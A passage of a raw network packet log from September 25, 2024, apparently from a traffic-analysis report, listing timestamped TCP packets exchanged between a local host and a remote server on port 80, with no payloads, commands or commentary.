                                        Sep 25, 2024 18:40:30.799712896 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.799721003 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.799746990 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.799787045 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.799807072 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.799859047 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.799896955 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.799901962 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.799921036 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.799937963 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.799958944 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.799963951 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.799981117 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.799997091 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.800000906 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.800013065 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.800029039 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.800035000 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.800040960 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.800052881 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.800060034 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.800064087 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.800076962 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.800105095 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.800120115 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.800127983 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.800146103 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.800152063 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.800158024 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.800168991 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.800179958 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.800180912 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.800193071 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.800205946 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.800210953 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.800216913 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.800224066 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.800229073 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.800240040 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.800245047 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.800251961 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.800262928 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.800273895 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.800295115 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.800301075 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.800314903 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.800327063 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.800328016 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.800338984 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.800349951 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.800362110 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.800362110 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.800374031 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.800385952 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.800390959 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.800399065 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.800410986 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.800417900 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.800424099 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.800432920 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.800436974 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.800460100 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.800468922 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.800489902 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.800502062 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.800504923 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.800513029 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.800524950 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.800524950 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.800535917 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.800548077 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.800559044 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.800570965 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.800570965 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.800587893 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.800596952 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.800601006 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.800612926 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.800623894 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.800642967 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.800651073 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.800668001 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.800679922 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.800687075 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.800692081 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.800704002 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.800714016 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.800715923 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.800729036 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.800731897 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.800740004 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.800750971 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.800760031 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.800764084 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.800776005 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.800786972 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.800798893 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.800811052 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.800822020 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.800827026 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.800837040 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.800839901 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.800851107 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.800863981 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.800867081 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.800877094 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.800889015 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.800899982 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.800900936 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.800913095 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.800925016 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.800930977 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.800936937 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.800957918 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.800960064 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.800976038 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.800978899 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.800998926 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.801011086 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.801011086 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.801023006 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.801033974 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.801043034 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.801048040 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.801059961 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.801068068 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.801070929 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.801083088 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.801094055 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.801094055 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.801105976 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.801117897 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.801117897 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.801137924 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.801142931 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.801162958 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.801177025 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.801183939 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.801197052 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.801207066 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.801208973 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.801220894 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.801233053 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.801242113 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.801244974 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.801256895 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.801268101 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.801269054 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.801280975 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.801284075 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.801291943 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.801306963 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.801311016 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.801318884 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.801331043 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.801342010 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.801347971 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.801354885 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.801366091 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.801374912 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.801378965 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.801390886 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.801392078 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.801403046 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.801415920 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.801423073 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.801429033 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.801440001 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.801449060 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.801451921 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.801464081 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.801465034 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.801476002 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.801487923 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.801490068 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.801500082 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.801513910 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.801520109 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.801527023 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.801536083 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.801538944 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.801552057 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.801562071 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.801563978 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.801577091 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.801588058 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.801594019 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.801600933 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.801608086 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.801613092 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.801625013 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.801636934 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.801645041 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.801647902 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.801660061 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.801671982 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.801671982 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.801683903 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.801692963 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.801697016 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.801706076 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.801708937 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.801721096 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.801731110 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.801734924 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.801748991 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.801757097 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.801759958 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.801773071 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.801784992 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.801795006 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.801799059 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.801820993 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.801836014 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.806752920 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.806797981 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.806857109 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.996295929 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.002722979 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.002739906 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.002752066 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.002768040 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.002779961 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.002791882 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.002830029 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.002840996 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.002907991 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.003206968 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.003217936 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.003235102 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.003247023 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.003254890 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.003267050 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.003273010 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.003279924 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.003290892 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.003298044 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.003303051 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.003314018 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.003324986 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.003331900 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.003339052 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.003369093 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.003401995 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.003453016 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.003464937 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.003475904 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.003488064 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.003500938 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.003508091 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.003511906 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.003524065 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.003536940 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.003542900 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.003549099 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.003561020 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.003570080 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.003572941 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.003586054 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.003590107 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.003611088 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.003633022 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.003791094 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.003803015 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.003819942 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.003840923 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.003993034 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.004004955 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.004017115 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.004029036 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.004029989 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.004040956 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.004051924 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.004056931 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.004062891 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.004074097 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.004084110 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.004085064 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.004096985 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.004108906 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.004117966 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.004122019 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.004134893 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.004141092 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.004147053 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.004153967 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.004158020 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.004168987 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.004177094 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.004180908 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.004195929 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.004200935 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.004220963 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.004523039 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.004563093 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.004703999 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.004868984 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.004880905 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.004892111 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.004901886 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.004904032 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.004920006 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.004923105 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.004933119 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.004945040 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.004956007 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.004962921 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.004967928 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.004978895 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.004985094 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.004990101 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.005002975 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.005009890 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.005022049 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.005028009 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.005033970 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.005044937 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.005049944 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.005055904 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.005067110 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.005073071 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.005076885 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.005088091 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.005095005 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.005100965 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.005117893 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.005589008 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.005600929 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.005613089 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.005625010 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.005636930 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.005641937 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.005646944 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.005671024 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.005752087 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.005764008 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.005774975 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.005788088 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.005793095 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.005800009 CEST8049716172.94.3.25192.168.2.6
